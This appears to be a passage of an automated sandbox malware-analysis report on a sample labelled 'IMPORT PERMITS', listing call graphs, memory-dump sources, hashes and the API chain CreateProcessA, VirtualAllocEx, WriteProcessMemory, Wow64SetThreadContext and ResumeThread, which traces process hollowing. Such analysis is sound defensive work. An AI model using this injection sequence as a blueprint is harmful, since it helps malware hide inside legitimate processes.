18593->18586 18594->18586 18595->18586 18596->18586 18597->18586 18598->18586 18599->18586 18663 2934d10 18600->18663 18668 2934d20 18600->18668 18601 293417e 18601->18553 18605 29342c0 18604->18605 18681 2932b78 18605->18681 18685 2932b70 18605->18685 18606 29349b8 18610 2934602 18609->18610 18611 2934573 18609->18611 18689 29324f0 18610->18689 18693 29324f8 18610->18693 18611->18553 18616 2932b70 WriteProcessMemory 18614->18616 18617 2932b78 WriteProcessMemory 18614->18617 18615 293469a 18616->18615 18617->18615 18697 29329e0 18618->18697 18701 29329d8 18618->18701 18619 29340a7 18624 2934357 18622->18624 18623 293448a 18623->18553 18624->18623 18625 29324f0 ResumeThread 18624->18625 18626 29324f8 ResumeThread 18624->18626 18625->18623 18626->18623 18628 2934711 18627->18628 18630 2932b70 WriteProcessMemory 18628->18630 18631 2932b78 WriteProcessMemory 18628->18631 18629 2934a66 18629->18553 18630->18629 18631->18629 18635 2933f9b 18632->18635 18633 2934b15 18633->18553 18635->18633 18705 2932e00 18635->18705 18709 2932df4 18635->18709 18639 2934586 18638->18639 18641 29329e0 Wow64SetThreadContext 18639->18641 18642 29329d8 Wow64SetThreadContext 18639->18642 18640 29345a1 18641->18640 18642->18640 18644 2934037 18643->18644 18646 2932e00 CreateProcessA 18644->18646 18647 2932df4 CreateProcessA 18644->18647 18645 293407f 18645->18553 18646->18645 18647->18645 18649 2934631 18648->18649 18651 29324f0 ResumeThread 18649->18651 18652 29324f8 ResumeThread 18649->18652 18650 2934573 18650->18553 18651->18650 18652->18650 18654 29345eb 18653->18654 18655 29343fc 18653->18655 18656 29324f0 ResumeThread 18654->18656 18657 29324f8 ResumeThread 18654->18657 18655->18553 18656->18655 18657->18655 18659 2934729 18658->18659 18713 2932c61 18659->18713 18717 2932c68 18659->18717 18660 29340a7 18660->18553 18664 2934d35 18663->18664 18673 2932ab0 18664->18673 18677 2932ab8 18664->18677 18665 2934d54 18665->18601 18669 2934d35 18668->18669 18671 2932ab0 VirtualAllocEx 18669->18671 18672 2932ab8 VirtualAllocEx 18669->18672 18670 2934d54 18670->18601 18671->18670 18672->18670 18674 2932ab8 VirtualAllocEx 18673->18674 18676 2932b35 18674->18676 18676->18665 18678 2932af8 VirtualAllocEx 18677->18678 18680 2932b35 18678->18680 18680->18665 18682 2932bc0 WriteProcessMemory 18681->18682 18684 2932c17 18682->18684 18684->18606 18686 2932b78 WriteProcessMemory 18685->18686 18688 2932c17 18686->18688 18688->18606 18690 2932538 ResumeThread 18689->18690 18692 2932569 18690->18692 18692->18611 18694 2932538 ResumeThread 18693->18694 18696 2932569 18694->18696 18696->18611 18698 2932a25 Wow64SetThreadContext 18697->18698 18700 2932a6d 18698->18700 18700->18619 18702 29329e0 Wow64SetThreadContext 18701->18702 18704 2932a6d 18702->18704 18704->18619 18706 2932e89 18705->18706 18706->18706 18707 2932fee CreateProcessA 18706->18707 18708 293304b 18707->18708 18710 2932e00 CreateProcessA 18709->18710 18712 293304b 18710->18712 18714 2932c68 ReadProcessMemory 18713->18714 18716 2932cf7 18714->18716 18716->18660 18718 2932cb3 ReadProcessMemory 18717->18718 18720 2932cf7 18718->18720 18720->18660 18721 1044668 18722 104467a 18721->18722 18723 1044686 18722->18723 18725 1044789 18722->18725 18726 104479d 18725->18726 18729 1044888 18726->18729 18731 10448af 18729->18731 18730 104498c 18731->18730 18733 10444d4 18731->18733 18734 1045918 CreateActCtxA 18733->18734 18736 10459db 18734->18736 18737 104d6c8 18738 104d70e 18737->18738 18741 104d8a8 18738->18741 18744 104bda0 18741->18744 18745 104d910 DuplicateHandle 18744->18745 18746 104d7fb 18745->18746

                                                                                                                                Executed Functions

                                                                                                                                Function 029356A0 Relevance: .3, Instructions: 341COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cd6025995cef4826a8be1342d894728b66ce20c46861efe8e682451cdff74f5c
                                                                                                                                • Instruction ID: 6b3ed9c189018d11a4f21dfe7bb43ee2d9a58c0fdd4b1d5142df4fea273cab37
                                                                                                                                • Opcode Fuzzy Hash: cd6025995cef4826a8be1342d894728b66ce20c46861efe8e682451cdff74f5c
                                                                                                                                • Instruction Fuzzy Hash: EAC1AA717017048FDB2AEB76C5907AEB7EAAF8D300F554469D18ACB3A0DB35E901CB51
                                                                                                                                Function 02933F68 Relevance: .2, Instructions: 165COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9d60d19271d44a345f109e5d5f1c8952db879b1855f557e284bbd641b4da14df
                                                                                                                                • Instruction ID: 1afd355357aa03c50f3f04783bb94c7e5b9bbf95631dffe603c6ac52e11c4a03
                                                                                                                                • Opcode Fuzzy Hash: 9d60d19271d44a345f109e5d5f1c8952db879b1855f557e284bbd641b4da14df
                                                                                                                                • Instruction Fuzzy Hash: E1610675D44229CBDB25CF66C8407E9BBBABF89300F11E5AAD40DA7245EB705AC5CF40
                                                                                                                                Function 02932DF4 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 501 2932df4-2932e95 504 2932e97-2932ea1 501->504 505 2932ece-2932eee 501->505 504->505 506 2932ea3-2932ea5 504->506 510 2932ef0-2932efa 505->510 511 2932f27-2932f56 505->511 508 2932ea7-2932eb1 506->508 509 2932ec8-2932ecb 506->509 512 2932eb3 508->512 513 2932eb5-2932ec4 508->513 509->505 510->511 515 2932efc-2932efe 510->515 521 2932f58-2932f62 511->521 522 2932f8f-2933049 CreateProcessA 511->522 512->513 513->513 514 2932ec6 513->514 514->509 516 2932f21-2932f24 515->516 517 2932f00-2932f0a 515->517 516->511 519 2932f0e-2932f1d 517->519 520 2932f0c 517->520 519->519 524 2932f1f 519->524 520->519 521->522 523 2932f64-2932f66 521->523 533 2933052-29330d8 522->533 534 293304b-2933051 522->534 525 2932f89-2932f8c 523->525 526 2932f68-2932f72 523->526 524->516 525->522 528 2932f76-2932f85 526->528 529 2932f74 526->529 528->528 530 2932f87 528->530 529->528 530->525 544 29330da-29330de 533->544 545 29330e8-29330ec 533->545 534->533 544->545 546 29330e0 544->546 547 29330ee-29330f2 545->547 548 29330fc-2933100 545->548 546->545 547->548 549 29330f4 547->549 550 2933102-2933106 548->550 551 2933110-2933114 548->551 549->548 550->551 552 2933108 550->552 553 2933126-293312d 551->553 554 2933116-293311c 551->554 552->551 555 2933144 553->555 556 293312f-293313e 553->556 554->553 558 2933145 555->558 556->555 558->558
                                                                                                                                APIs
                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02933036
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 963392458-0
                                                                                                                                • Opcode ID: d4194f32067a893b35f8d0ef6fc80b9dfc43f8c5760452b016d688799d3140be
                                                                                                                                • Instruction ID: 1f3ef5752110c565a64b4dbc11c393e06a296e90b3908319e55b5d704afe06ac
                                                                                                                                • Opcode Fuzzy Hash: d4194f32067a893b35f8d0ef6fc80b9dfc43f8c5760452b016d688799d3140be
                                                                                                                                • Instruction Fuzzy Hash: 9EA15C71D0021ADFEF21CFA8C8817EDBBB6BF48314F1485A9E848A7250DB759985CF91
                                                                                                                                Function 02932E00 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 559 2932e00-2932e95 561 2932e97-2932ea1 559->561 562 2932ece-2932eee 559->562 561->562 563 2932ea3-2932ea5 561->563 567 2932ef0-2932efa 562->567 568 2932f27-2932f56 562->568 565 2932ea7-2932eb1 563->565 566 2932ec8-2932ecb 563->566 569 2932eb3 565->569 570 2932eb5-2932ec4 565->570 566->562 567->568 572 2932efc-2932efe 567->572 578 2932f58-2932f62 568->578 579 2932f8f-2933049 CreateProcessA 568->579 569->570 570->570 571 2932ec6 570->571 571->566 573 2932f21-2932f24 572->573 574 2932f00-2932f0a 572->574 573->568 576 2932f0e-2932f1d 574->576 577 2932f0c 574->577 576->576 581 2932f1f 576->581 577->576 578->579 580 2932f64-2932f66 578->580 590 2933052-29330d8 579->590 591 293304b-2933051 579->591 582 2932f89-2932f8c 580->582 583 2932f68-2932f72 580->583 581->573 582->579 585 2932f76-2932f85 583->585 586 2932f74 583->586 585->585 587 2932f87 585->587 586->585 587->582 601 29330da-29330de 590->601 602 29330e8-29330ec 590->602 591->590 601->602 603 29330e0 601->603 604 29330ee-29330f2 602->604 605 29330fc-2933100 602->605 603->602 604->605 606 29330f4 604->606 607 2933102-2933106 605->607 608 2933110-2933114 605->608 606->605 607->608 609 2933108 607->609 610 2933126-293312d 608->610 611 2933116-293311c 608->611 609->608 612 2933144 610->612 613 293312f-293313e 610->613 611->610 615 2933145 612->615 613->612 615->615
                                                                                                                                APIs
                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02933036
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 963392458-0
                                                                                                                                • Opcode ID: 87d5d57693b3f8a89adbaf6c5bfb6ebc248bf17de4f03520a69e943984074a93
                                                                                                                                • Instruction ID: 6c7123cd971cadb660e1a3e77be6875e4b31f64d8756d6516912be9274253ee6
                                                                                                                                • Opcode Fuzzy Hash: 87d5d57693b3f8a89adbaf6c5bfb6ebc248bf17de4f03520a69e943984074a93
                                                                                                                                • Instruction Fuzzy Hash: 8C916D71D0021ADFDF21CFA8C8817EDBBB6BF48314F1485A9E848A7250DB749985CF91
                                                                                                                                Function 0104B017 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 616 104b017-104b037 617 104b063-104b067 616->617 618 104b039-104b046 call 10499a0 616->618 620 104b069-104b073 617->620 621 104b07b-104b0bc 617->621 624 104b05c 618->624 625 104b048-104b056 call 104b2c0 618->625 620->621 627 104b0be-104b0c6 621->627 628 104b0c9-104b0d7 621->628 624->617 625->624 634 104b198-104b258 625->634 627->628 629 104b0d9-104b0de 628->629 630 104b0fb-104b0fd 628->630 632 104b0e0-104b0e7 call 104a370 629->632 633 104b0e9 629->633 635 104b100-104b107 630->635 637 104b0eb-104b0f9 632->637 633->637 666 104b260-104b28b GetModuleHandleW 634->666 667 104b25a-104b25d 634->667 638 104b114-104b11b 635->638 639 104b109-104b111 635->639 637->635 642 104b11d-104b125 638->642 643 104b128-104b131 call 104a380 638->643 639->638 642->643 647 104b133-104b13b 643->647 648 104b13e-104b143 643->648 647->648 649 104b145-104b14c 648->649 650 104b161-104b16e 648->650 649->650 652 104b14e-104b15e call 104a390 call 104a3a0 649->652 657 104b170-104b18e 650->657 658 104b191-104b197 650->658 652->650 657->658 668 104b294-104b2a8 666->668 669 104b28d-104b293 666->669 667->666 669->668
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0104B27E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: 59cf59509817c17265f27cba5f75f631a07c85140e05bd959446f8eed25689b4
                                                                                                                                • Instruction ID: 67c3a99e36d186e88e48b08739d12a4f21cb9c8dfbc39f34ecff05ff55031bb0
                                                                                                                                • Opcode Fuzzy Hash: 59cf59509817c17265f27cba5f75f631a07c85140e05bd959446f8eed25689b4
                                                                                                                                • Instruction Fuzzy Hash: DB8145B0A00B058FEB64DF29D48579ABBF1FF88304F008A6DE49AD7A50D775E945CB90
                                                                                                                                Function 010444D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 780 10444d4-10459d9 CreateActCtxA 784 10459e2-1045a3c 780->784 785 10459db-10459e1 780->785 792 1045a3e-1045a41 784->792 793 1045a4b-1045a4f 784->793 785->784 792->793 794 1045a60 793->794 795 1045a51-1045a5d 793->795 797 1045a61 794->797 795->794 797->797
                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 010459C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: 89fd74c5871cb632ecf7498c879b209ae62b2fd7cff5ad00a52a639f524d7b19
                                                                                                                                • Instruction ID: 994c21f7f6b816a47a9d8089a997dfef0bd61ed053dd02750a53623ee96801e0
                                                                                                                                • Opcode Fuzzy Hash: 89fd74c5871cb632ecf7498c879b209ae62b2fd7cff5ad00a52a639f524d7b19
                                                                                                                                • Instruction Fuzzy Hash: 4C41DFB0C0071DCBDB24DFA9C884A9EBBF5BF49304F2480AAD448AB255DB756945CF91
                                                                                                                                Function 01045915 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 798 1045915-1045916 799 104591c-10459d9 CreateActCtxA 798->799 801 10459e2-1045a3c 799->801 802 10459db-10459e1 799->802 809 1045a3e-1045a41 801->809 810 1045a4b-1045a4f 801->810 802->801 809->810 811 1045a60 810->811 812 1045a51-1045a5d 810->812 814 1045a61 811->814 812->811 814->814
                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 010459C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: 39edcbe8200799f45ad4a5bf2426d5159f18062ddd56b5cf8d813bef3b9f33eb
                                                                                                                                • Instruction ID: cff165e17bd8da782d79939c4b4d594fa2701f8db6ae7e7a5746b8c9e10003a1
                                                                                                                                • Opcode Fuzzy Hash: 39edcbe8200799f45ad4a5bf2426d5159f18062ddd56b5cf8d813bef3b9f33eb
                                                                                                                                • Instruction Fuzzy Hash: 4141CEB1C00719CFDB24CFA9C88469EBBF5BF49304F2480AAD448AB255DB756989CF91
                                                                                                                                Function 02932B70 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 815 2932b70-2932bc6 818 2932bd6-2932c15 WriteProcessMemory 815->818 819 2932bc8-2932bd4 815->819 821 2932c17-2932c1d 818->821 822 2932c1e-2932c4e 818->822 819->818 821->822
                                                                                                                                APIs
                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02932C08
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                • Opcode ID: 37c1d9332b56b41ac1a90f133cd3ddd1c36282b82e904cd794e6018b51a272f6
                                                                                                                                • Instruction ID: 5f8b4c70d3647389cfae3ba04c9338b5fa165f9a52bcc844cb3154001b75514e
                                                                                                                                • Opcode Fuzzy Hash: 37c1d9332b56b41ac1a90f133cd3ddd1c36282b82e904cd794e6018b51a272f6
                                                                                                                                • Instruction Fuzzy Hash: A9215AB1D003599FDB10CFA9C981BDEBBF5FF48310F108429E918A7250C7789984CBA4
                                                                                                                                Function 02932B78 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 826 2932b78-2932bc6 828 2932bd6-2932c15 WriteProcessMemory 826->828 829 2932bc8-2932bd4 826->829 831 2932c17-2932c1d 828->831 832 2932c1e-2932c4e 828->832 829->828 831->832
                                                                                                                                APIs
                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02932C08
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                • Opcode ID: fec92a092834c406b05b25bb2d0a93579cb4c56c8070b381ced42dfc7c3db50d
                                                                                                                                • Instruction ID: 8538fee9212332ec1b717522dd24198e6cb735e5332159f266b9ae33e1307fc4
                                                                                                                                • Opcode Fuzzy Hash: fec92a092834c406b05b25bb2d0a93579cb4c56c8070b381ced42dfc7c3db50d
                                                                                                                                • Instruction Fuzzy Hash: 1F2136B1D003599FDB10DFA9C985BDEBBF5FF48314F10842AE958A7250C778A944CBA4
                                                                                                                                Function 02932C61 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 853 2932c61-2932cf5 ReadProcessMemory 857 2932cf7-2932cfd 853->857 858 2932cfe-2932d2e 853->858 857->858
                                                                                                                                APIs
                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02932CE8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                • Opcode ID: d5b6545ea26bc20a8c0ac80707b0e1663d3e0e7a8290433a7f43f3f5bdf774ca
                                                                                                                                • Instruction ID: e21730b8f1d14ff5f6a4066f48c5016807b29278d38e50615239aa97b39b1de6
                                                                                                                                • Opcode Fuzzy Hash: d5b6545ea26bc20a8c0ac80707b0e1663d3e0e7a8290433a7f43f3f5bdf774ca
                                                                                                                                • Instruction Fuzzy Hash: A92128B1D003599FDB10DFAAC981ADEFBF5FF48310F108429E958A7250C7759944CBA5
                                                                                                                                Function 029329D8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 842 29329d8-2932a2b 845 2932a3b-2932a6b Wow64SetThreadContext 842->845 846 2932a2d-2932a39 842->846 848 2932a74-2932aa4 845->848 849 2932a6d-2932a73 845->849 846->845 849->848
                                                                                                                                APIs
                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02932A5E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 983334009-0
                                                                                                                                • Opcode ID: 904a17dbc72fa0cb5e6498996fdea2dfa4834b23dfb8680084904e35cb1c9863
                                                                                                                                • Instruction ID: 6fa89660bf6d99cdbcb7c15590e7e1cd156d73c8c08bcd6f6089bc1334b553d9
                                                                                                                                • Opcode Fuzzy Hash: 904a17dbc72fa0cb5e6498996fdea2dfa4834b23dfb8680084904e35cb1c9863
                                                                                                                                • Instruction Fuzzy Hash: AD213AB1D003098FDB10DFAAC4857EEBBF5EF48314F10842AD559A7240C7789985CFA5
                                                                                                                                Function 0104BDA0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 836 104bda0-104d9a4 DuplicateHandle 838 104d9a6-104d9ac 836->838 839 104d9ad-104d9ca 836->839 838->839
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0104D8D6,?,?,?,?,?), ref: 0104D997
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: dc48be5f944af61e4c568775f38adaf34f8ef1fb762ea8e7a420bf85109481cd
                                                                                                                                • Instruction ID: 65bf568ab06b07e5871aff9d7a859df94cc4a1c947ee3463195263e62ca82413
                                                                                                                                • Opcode Fuzzy Hash: dc48be5f944af61e4c568775f38adaf34f8ef1fb762ea8e7a420bf85109481cd
                                                                                                                                • Instruction Fuzzy Hash: C02114B5900248EFDB10CF9AD984ADEFFF5EB48310F14842AE958A3310D374A940CFA4
                                                                                                                                Function 0104D909 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 862 104d909-104d9a4 DuplicateHandle 863 104d9a6-104d9ac 862->863 864 104d9ad-104d9ca 862->864 863->864
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0104D8D6,?,?,?,?,?), ref: 0104D997
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: d363450133a9f97947aeb53943e2598979282733229b8fecba43796ea5fa0c1a
                                                                                                                                • Instruction ID: 3b6727a43bf979efd8a4faa09c97fe5308056f128c75fea944490447d6e71812
                                                                                                                                • Opcode Fuzzy Hash: d363450133a9f97947aeb53943e2598979282733229b8fecba43796ea5fa0c1a
                                                                                                                                • Instruction Fuzzy Hash: F62114B59002589FDB10CF9AD984ADEFFF5FB48320F14841AE958A3310C378A940CFA5
                                                                                                                                Function 02932C68 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02932CE8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                • Opcode ID: 7d5bcc59a9c74f0ac59385ac3e491c11eccbf3677b9d38324a4ee697fe8c4a56
                                                                                                                                • Instruction ID: 4851d2069283942501ebfb39d76850752e22cec8fa969f8286518c06de8ff405
                                                                                                                                • Opcode Fuzzy Hash: 7d5bcc59a9c74f0ac59385ac3e491c11eccbf3677b9d38324a4ee697fe8c4a56
                                                                                                                                • Instruction Fuzzy Hash: B02128B1D003599FDB10DFAAC980ADEFBF5FF48310F108429E958A7250C7749944CBA4
                                                                                                                                Function 029329E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02932A5E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 983334009-0
                                                                                                                                • Opcode ID: 4681739af34af92884277c955b2f01213a974b0d8fa7f06c646fedb35ff19fa1
                                                                                                                                • Instruction ID: 8115b94479766e4df8ec254f3d13ed9bc4e5d5ad8fee13b7e1c7ae305aace53f
                                                                                                                                • Opcode Fuzzy Hash: 4681739af34af92884277c955b2f01213a974b0d8fa7f06c646fedb35ff19fa1
                                                                                                                                • Instruction Fuzzy Hash: 212118B1D003098FDB10DFAAC5857EEBBF5EF88324F148429D559A7240C7789985CFA5
                                                                                                                                Function 02932AB0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02932B26
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: 00c2f6356ee18aa6918b8674e9fc72493244236cf179e25b58e86d76014af98d
                                                                                                                                • Instruction ID: a68651572882c64dc09b636eda7b1321577e9b0ab5c351acbd84eb627e306768
                                                                                                                                • Opcode Fuzzy Hash: 00c2f6356ee18aa6918b8674e9fc72493244236cf179e25b58e86d76014af98d
                                                                                                                                • Instruction Fuzzy Hash: AB1159719002499FCB10DFA9D845ADEBFF5EF89320F208419E515A7250C775A940CFA0
                                                                                                                                Function 02932AB8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02932B26
